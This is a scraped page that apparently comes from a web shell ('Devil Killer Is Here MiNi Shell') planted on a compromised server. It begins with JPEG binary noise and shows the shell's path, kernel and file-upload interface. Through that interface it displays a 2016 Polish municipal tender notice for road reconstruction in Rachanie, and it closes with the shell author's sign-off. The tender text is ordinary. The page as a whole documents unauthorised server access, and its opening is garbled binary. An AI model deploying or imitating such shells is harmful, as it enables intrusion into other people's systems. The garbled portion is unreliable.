JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160720/144967-N-2016.html

<p class="kh_header"><b>Rachanie: Przebudowa dróg w osiedlu mieszkaniowym byłego Zasobu Własności   Rolnej Skarbu Państwa w obrębie Michalów - Kolonia</b><br>
<b>Numer ogłoszenia: 144967 - 2016; data zamieszczenia: 20.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Rachanie , ul. Dolna 1, 22-640 Rachanie, woj. lubelskie, tel. 084 6471103, faks 084 6471103.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rachanie.gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa dróg w osiedlu mieszkaniowym byłego Zasobu Własności   Rolnej Skarbu Państwa w obrębie Michalów - Kolonia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.   Przedmiotem zamówienia jest: 
      Przebudowa dróg w osiedlu mieszkaniowym byłego Zasobu Własności Rolnej Skarbu Państwa   
      w obrębie Michalów - Kolonia:
      a) ZADANIE NR 1 - odcinek drogi w granicach działek nr geodezyjny 180, 182, 184
                                        długości 0,071 km
          Zamówienie obejmuje:
          - roboty pomiarowe
          - roboty ziemne,
          - ułożenie krawężników,
          - wykonanie warstwy odsączającej,
          - wykonanie podbudowy betonowej z betonu B-15,
          - nawierzchnia z kostki brukowej gr. 8 cm,
          - wykonanie odwodnienia liniowego i studni chłonnych,
          - roboty wykończeniowe,
          - oznakowanie pionowe.
      b) ZADANIE NR 2 - odcinek drogi w granicach działek nr geodezyjny 114, 119, 121, 123 
                                         długości 0,158 km
          Zamówienie obejmuje:
          - roboty pomiarowe
          - roboty ziemne,
          - ułożenie krawężników,
          - wykonanie warstwy odsączającej,
          - wykonanie podbudowy betonowej z betonu B-15,
          - nawierzchnia z kostki brukowej gr. 8 cm,
          - nawierzchnia z kamienia tłuczniowego,
          - wykonanie odwodnienia liniowego i studni chłonnych,
          - roboty wykończeniowe,
          - oznakowanie pionowe..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.31.40-2, 45.10.00.00-8, 45.11.22.10-0, 45.11.10.00-8, 45.23.33.20-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1)	Każda oferta musi być zabezpieczona wadium o wartości:
5 000,00 PLN ( słownie: pięć tys. PLN ).
2)	Wadium należy wnieść przed upływem terminu składania ofert.
3)	Wadium może być wniesione w jednej lub kilku następujących formach:
- pieniądzu,
   - poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej,
     z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
   - gwarancjach bankowych,
   - gwarancjach ubezpieczeniowych,
   - poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z 
     dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr
     109 poz. 1158 z późn. zm.).
4)	Wadium wnoszone w formie pieniężnej należy wpłacić PRZELEWEM na rachunek bankowy w Banku Spółdzielczym w Tomaszowie Lub. Oddział Rachanie, nr rachunku  22 9639 1048 2005 4800 0042 0006 	.
Wadium wnoszone w formie przelewu powinno znajdować się na rachunku Zamawiającego w terminie składania ofert tj. dnia 4.08.2016r.  Za skuteczne wniesione wadium w pieniądzu Zamawiający uważa wadium, które w oznaczonym wyżej terminie znajdzie się na koncie Zamawiającego.
5)	Wadium wnoszone w pozostałych formach należy dołączyć do oferty.
6)	Polisa, poręczenie, gwarancja lub inny dokument stanowiący formę wadium musi być wystawione co najmniej na okres przed upływem terminu składania ofert do końca terminu związania ofertą oraz zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty wadium zgodnie z warunkami specyfikacji istotnych warunków zamówienia, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta - poręczyciela.
7)	Wykonawca, który nie wniósł wadium zostanie wykluczony z postępowania na podstawie art. 24 ust. 2 pkt.2 ustawy, a jego oferta zostanie odrzucona na podstawie art. 24 ust. 4 ustawy PZP.
8)	Wykonawca, którego oferta została wybrana traci wadium wraz z odsetkami na rzecz Zamawiającego w okolicznościach przewidzianych w art. 46 ust. 4a i 5 ustawy PZP.
9)	Zamawiający zwraca wadium w okolicznościach przewidzianych w art. 46 ust.1, 1a i 2 ustawy Prawo zamówień publicznych. Dyspozycję w zakresie zwrotu wniesionych w pieniądzu wadiów, Zamawiający przekaże na rachunek bankowy Wykonawców niezwłocznie po wyborze oferty najkorzystniejszej lub po unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza.
10)	Wykonawcy, którego oferta zastanie wybrana jako najkorzystniejsza, Zamawiający zwróci wadium  niezwłocznie po zawarciu umowy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje żadnych wymagań, których spełnienia Wykonawca
     zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż w okresie 5 lat 
     przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest 
     krótszy w tym okresie wykonał należycie co najmniej jedną robotę budowlaną 
     odpowiadającą przedmiotowi zamówienia tj. remontu, budowy, przebudowy drogi lub placu 
     z podbudową betonową o nawierzchni z kostki brukowej o wartości zamówienia minimum 
     100 tys. PLN (brutto).  
    Na potwierdzenie powyższego, należy podać rodzaj i wartość robót, datę i miejsce ich 
    wykonania oraz dołączyć dokumenty potwierdzające, że roboty zostały wykonane 
    zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone; 
     Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana na 
     podstawie złożonych dokumentów i oświadczeń, według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje żadnych wymagań, których spełnienia Wykonawca
     zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest zapewnić wykonanie i kierowanie robotami 
             stanowiącymi przedmiot zamówienia przez osoby posiadające stosowne kwalifikacje 
             zawodowe i uprawnienia budowlane:
                  kierownik budowy - wskazany w ofercie, jako osoba nadzorująca proces 
                  budowlany w świetle ustawy Prawo budowlane powinna posiadać doświadczenie
                  zawodowe w kierowaniu robotami ( z minimalnym 5 - letnim stażem pracy)oraz 
                  uprawnienia do wykonywania samodzielnych funkcji w budownictwie w 
                  specjalności drogowej,
             Osoba ta powinna posiadać odpowiednie uprawnienia budowlane do kierowania 
             robotami budowlanymi, zgodnie z ustawą z dnia 7 lipca 1994r. Prawo budowlane 
             ( t.j. Dz. U. z 2016r., poz. 290 z późn. zm. )
           Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana na 
           podstawie złożonych dokumentów i oświadczeń, według formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje żadnych wymagań, których spełnienia Wykonawca
     zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.  Formularz ofertowy - ( załącznik Nr 1 do SIWZ ) 
      2. Kosztorys ofertowy ( w formie pełnej lub uproszczonej - zawierający ilość robót, 
          cenę jednostkową oraz wartość pozycji) sporządzony na podstawie dokumentacji 
          projektowej i przedmiarów robót, obejmujący wszystkie pozycje przedmiarów - 
         ( załącznik Nr 12  do SIWZ ),
          Z uwagi na formę wynagrodzenia ryczałtowego kosztorys ofertowy nie będzie 
          podlegać ocenie. Kosztorys ofertowy będzie niezbędny do rozliczenia się z 
          Wykonawcą w sytuacji, jeżeli powstaną okoliczności wykonania nieprzewidzianych
          robót zamiennych lub będzie konieczność zaniechania części robót.	
     3.  Zamawiający żąda aby Wykonawca do ofert dołączył dokument lub dokumenty, z 
          których będzie wynikać uprawnienie do podpisywania oferty np. aktualny odpis z 
          właściwego rejestru, aktualne zaświadczenie o wpisie do ewidencji działalności 
           gospodarczej, aktualny statut spółki lub rejestr handlowy,	
      4. Jeżeli uprawnienie do reprezentowania osoby podpisującej ofertę nie wynika z 
           załączonego dokumentu o którym mowa wyżej do oferty należy dołączyć 
           pełnomocnictwo w oryginale lub kopii poświadczonej notarialnie,	
      5.  Wykaz i zakres robót , które Wykonawca zamierza powierzyć podwykonawcom,
           którzy będą uczestniczyć w wykonywaniu zamówienia - (załącznik Nr 8  do SIWZ),
      7.  W przypadku, gdy oferowane są rozwiązania równoważne, Wykonawca załącza 
           dokumenty potwierdzające równoważność w stosunku do rozwiązań określonych w 
           dokumentacji projektowej (atesty, certyfikaty, dokumentacja techniczna itp.) 
           zgodnie z art. 30 ust. 5 ustawy PZP,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - udzielona rękojmia za wady - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany niniejszej umowy wymagają dla swej ważności formy pisemnej pod rygorem nieważności i będą dopuszczalne w granicach unormowania artykułu 144 ustawy Prawo zamówień publicznych.	

2.	Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy, w stosunku do treści oferty Wykonawcy, w następującym zakresie i okolicznościach:
   1)	zmiany terminu zakończenia wykonania przedmiotu umowy o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy, w następujących przypadkach:
1.	wystąpienie  konieczności  wykonania  dodatkowych  i   niemożliwych  do  przewidzenia  robót, których realizacja wiąże się z potrzebą zmiany terminu wykonania,
2.	wstrzymanie realizacji robót przez Zamawiającego,
3.	nieprzekazanie placu budowy w terminie 14 dni roboczych od daty zawarcia umowy,
4.	wstrzymanie realizacji robót przez właściwe organy administracji publicznej bądź orzeczeniem sądu,
5.	przekroczenie zakreślonych przez prawo terminów wydawania przez organ administracji decyzji, zezwoleń, itp.,
6.	odmowa   wydania   przez   organ   administracji   wymaganych   decyzji,   zezwoleń,   uzgodnień na skutek błędów w dokumentacji projektowej,
7.	konieczności przeprojektowania określonych zakresów obiektu w trakcie realizacji inwestycji, niezbędnych do prawidłowego wykonania przedmiotu umowy,
8.	wystąpienie warunków uniemożliwiających prowadzenie robót budowlanych zgodnie ze sztuką budowlaną i wiedzą techniczna,
9.	konieczności   wykonania   robót  wykopaliskowych   uniemożliwiających  wykonanie  przedmiotu umowy,
10.	wystąpienie innych szczególnych okoliczności, za które Wykonawca nie jest   
      odpowiedzialny,
11.	siły wyższej,
2)	  zmiany materiałów koniecznych do wykonywania robót pod warunkiem, że zmiana ta 
      będzie korzystna dla Zamawiającego lub wynikająca z niedostępności na rynku tych 
      materiałów spowodowanej zaprzestaniem produkcji lub wycofaniem z rynku,
3)	  wystąpienia warunków geologicznych, archeologicznymi lub terenowych odmiennych 
      od przyjętych w dokumentacji projektowej, w szczególności istnienie podziemnych 
      urządzeń, instalacji lub obiektów infrastrukturalnych,
4)	 wprowadzenia zmian w stosunku do dokumentacji projektowej na wykonanie robót 
     zamiennych niewykraczających poza zakres przedmiotu zamówienia w sytuacji 
     konieczności zwiększenia bezpieczeństwa realizacji robót budowlanych, usprawnienia 
     procesu budowu bądź usunięcia wad ukrytych dokumentacji projektowej i uzyskania 
     założonego efektu użytkowego oraz zmiany obowiązujących przepisów prawa;
5)	 zmniejszenia zakresu rzeczowego w obiektywnie uzasadnionych przypadkach,
6)	 zmiany ustawowej stawki podatku VAT,
7)	zmiany Podwykonawcy robót, pod warunkiem wyrażenia zgody Zamawiającego na taką 
     zmianę oraz spełnieniem przez nowego Podwykonawcę takich samych warunków jak 
     Podwykonawca pierwotny.
8)  zmiany powszechnie obowiązujących przepisów prawa w zakresie mających wpływ 
     na realizację zamówienia,
9)  w zakresie zmiany osób, które będą wykonywać zamówienie lub będą uczestniczyć 
     w wykonywaniu zamówienia, za uprzednią zgodą Zamawiającego w przypadku:
      - śmierci, choroby lub innych zdarzeń losowych,
      - nie wywiązywania się z obowiązków wynikających z umowy, jeżeli zmiana stanie
         się konieczna z jakichkolwiek przyczyn niezależnych od Wykonawcy np. rezygnacja,
10) gdy zmianie ulegną zapisy umowy, przedmiotem której jest dofinansowanie tej 
      inwestycji, w tym m.in. zmiana sposobu rozliczenia umowy lub dofinansowania 
      płatności.

3.  Określa się następujący tryb dokonywania zmian postanowień umowy:
      1.   zmiana postanowień zawartej umowy może nastąpić wyłącznie, za zgodą obu stron 
           wyrażoną na piśmie, pod rygorem nieważności,
      2.   strona występująca o zmianę postanowień zawartej umowy zobowiązana jest do 
           udokumentowania zaistnienia okoliczności powodujących zmianę umowy,
      3.  wniosek o zmianę postanowień zawartej umowy musi być wyrażony na piśmie.
      4.  Zamawiający nie ma obowiązku zmiany postanowień umowy, jeżeli Wykonawca w 
           terminie 3 dni od wystąpienia okoliczności powodujących dokonanie zmiany, nie
           złoży Zamawiającemu, na piśmie, uzasadnionego i udokumentowanego wniosku o 
           dokonanie zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rachanie.gmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Rachaniach
ul. Dolna 1, pokój nr 1, 
22-640 Rachanie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2016 godzina 11:00, miejsce: Urząd Gminy w Rachaniach
ul. Dolna 1, pokój nr 10 (sekretariat)
22-640 Rachanie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 03.09.2016.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com